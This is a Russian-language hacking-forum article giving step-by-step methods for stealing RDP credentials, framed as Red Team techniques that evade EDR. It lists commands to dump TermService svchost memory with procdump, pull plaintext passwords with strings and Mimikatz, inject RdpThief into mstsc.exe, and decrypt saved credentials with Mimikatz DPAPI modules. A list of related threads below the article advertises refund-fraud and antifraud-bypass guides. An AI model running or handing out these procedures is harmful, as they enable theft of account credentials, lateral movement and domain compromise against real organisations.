Статья Методы извлечения учетных данных RDP для Red Team операций

devqp

Премиум
Протокол RDP широко используется для удаленного управления Windows-системами, но часто недостаточно защищен. Для Red Team операций извлечение учетных данных из процессов, связанных с RDP, может привести к горизонтальному перемещению или полной компрометации домена. Альтернативные методы обхода контроля EDR включают анализ процессов svchost.exe и mstsc.exe вместо lsass.

Метод 1: Извлечение из svchost.exe
При RDP-аутентификации учетные данные хранятся в памяти svchost в открытом виде. Для идентификации нужного процесса:
Код:
sc queryex termservice
tasklist /M:rdpcorets.dll
netstat -nob | Select-String TermService -Context 1
После определения PID выполните дамп памяти:
Код:
procdump64.exe -ma PID -accepteula C:\target_dir
Анализ оффлайн:
Код:
strings -el dumpfile | grep 'Password' -C3
Или через Mimikatz:
Код:
privilege::debug
ts::logonpasswords

Метод 2: Перехват через mstsc.exe
Инструменты RdpThief и SharpRDPThief перехватывают API-вызовы (CredIsMarshaledCredentialW, CryptProtectMemory). Внедрение DLL:
Код:
SimpleInjector.exe mstsc.exe RdpThief.dll
Учетные данные сохраняются в C:\temp\creds.txt с IP-адресом цели. SharpRDPThief использует IPC-сервер для устойчивости.

Метод 3: Расшифровка сохраненных подключений
Сохраненные RDP-учетные данные хранятся в:
Код:
C:\Users\username\AppData\Local\Microsoft\Credentials\
Используйте Mimikatz для дешифровки:
Код:
dpapi::cred /in:C:\path\to\cred_file
sekurlsa::dpapi
dpapi::cred /in:C:\path\to\cred_file /masterkey:KEY
vault::list
Ключ GuidMasterKey из вывода sekurlsa::dpapi обязателен для дешифровки. Результат содержит логин/пароль в открытом виде.
 
Похожие темы
devqp Статья Уязвимости генерации Unpredictable Number в EMV и методы извлечения ARQC Уязвимости и взлом 0
devqp Статья Уязвимости генерации Unpredictable Number в EMV и методы извлечения ARQC Уязвимости и взлом 0
devqp Статья Эффективные методы скрытия вашего местоположения в сети Анонимность и приватность 0
devqp Статья Техники персистенции в пользовательском режиме: методы и инструменты Уязвимости и взлом 0
devqp Статья Полное руководство по FTID: методы мошеннических возвратов от V1 до V10 Фишинг, мошенничество, СИ 0
devqp Статья Эффективные методы построения лояльной команды: от НЛП до ситуационного контроля Полезные статьи 0
devqp Статья Практические методы обхода антифрод-систем: ключевые принципы Уязвимости и взлом 0
devqp Статья Эффективные методы защиты от утечки геолокации в сети Анонимность и приватность 0
devqp Статья Обход защиты CloudFlare: методы и инструменты Уязвимости и взлом 0
devqp Статья Извлечение учетных данных RDP: методы обхода EDR для Red Team Уязвимости и взлом 0
Admin UFOLABSNEWS Северокорейские хакеры используют сложные методы для атак на разработчиков. Новости в сети 0
Admin UFOLABSNEWS Троян Gaslight использует новые методы обмана для противодействия ИБ-специалистам. Новости в сети 0
Admin Интересно Группа Webworm активно развивает свои методы атак. Новости в сети 0
Admin Интересно Израильские компании разработали методы отслеживания пользователей Starlink. Новости в сети 0
Admin Интересно Китайские хакеры используют изощрённые методы для слежки за журналистами и активистами. Новости в сети 0
Admin Статья Новые методы антидебага Полезные статьи 0
Admin Статья Физическая прослушка: методы и защита. Анонимность и приватность 0
Admin Статья Backdoors и шпионы. Методы защиты Анонимность и приватность 0
Admin Статья Методы маскировки трафика и обхода средств обнаружения и блокировок (ShadowSocks, V2Ray/X-Ray и Cloak) Анонимность и приватность 0
Admin Статья Методы иньекции ELF файлов Вирусология 0
Admin Статья Методы поиска по электронной почте OSINT 0
wrangler65 Обход sms уведомлений и вход в лк: Cовременные методы работы с брут ба 2025 Все остальное 0
Support81 Взгляд изнутри: BlackBastaGPT раскрывает тактики и методы известной хакерской банды Новости в сети 0
Support81 HardBit 4.0: шифрование по паролю и сложные методы обхода анализа Новости в сети 0
El_IRBIS Интересно WallEscape: Уязвимость и методы её предотвращения. Уязвимости и взлом 0
TrashHellSoDomy Работающие методы по борьбе с гриппом типа ковида Юмор 3
N Методы манипуляции. 10 приемов. Фишинг, мошенничество, СИ 0
B Ищу методы для того чтобы быстро поспать с парнями бесплатно и безопасно. Свободное общение 2
Y Backdoors и шпионы. Методы защиты Анонимность и приватность 34
G Методы обхода фильтров по расширению при загрузке файлов Полезные статьи 0
K Владимир Макулов-методы Быстрого Погружения В Глубокий Гипноз. Гипнотерапия. Раздачи и сливы 0
K Geekbrains Безопасность в сети. Методы взлома и защиты https://mega.nz/#%2194l2kbLS%21B-PiBnPOyI9xypx8p-SqwM8S-JT5o1GRBlBV5cRFrg4 Раздачи и сливы 0
K Новые методы социальной инженерии Ч.2 Полезные статьи 0
K Новые методы социальной инженерии Полезные статьи 0
R [instagram] Раскручиваем Аккаунт С 0 До 50к Фолловеров Быстрые Методы Заработка Способы заработка 0
T Методы психологического воздействия Полезные статьи 0
A Методы шифрования Программирование 1
M Методы взлома телофонов по bluetooth Уязвимости и взлом 2
B Схема извлечения трафика из Ютюба с конвертацией на кинопартнерке. Программирование 0
Admin Интересно Chick-fil-A сообщила об утечке данных после атак с использованием украденных учетных данных. Новости в сети 0
Admin UFOLABSNEWS Полиция ликвидировала сеть распространения вредоносных программ Amadey и StealC, восстановив 27 млн украденных учетных данных. Новости в сети 0
Admin Интересно Вредоносное ПО для кражи учетных данных обнаружено в популярном инструменте Codex. Новости в сети 0
Admin Интересно Новый бэкдор PamDOORa использует модули PAM для кражи SSH-учетных данных. Новости в сети 0
Admin Интересно Хакеры используют уязвимость CVE-2025-55182 для взлома 766 хостов Next.js и кражи учетных данных. Новости в сети 0
Admin Интересно Хакеры используют уведомления LinkedIn для кражи учетных данных. Новости в сети 0
Admin Интересно TeamPCP взламывает GitHub Actions Checkmarx с использованием украденных учетных данных CI. Новости в сети 0
Admin Интересно Storm-2561 распространяет троянские VPN-клиенты через SEO-отравление для кражи учетных данных. Новости в сети 0
Admin Интересно Злоумышленники используют уязвимости FortiGate для проникновения в сети и кражи учетных данных. Новости в сети 0
A БД содержащая 1,4 млрд учетных данных Полезные статьи 14

Название темы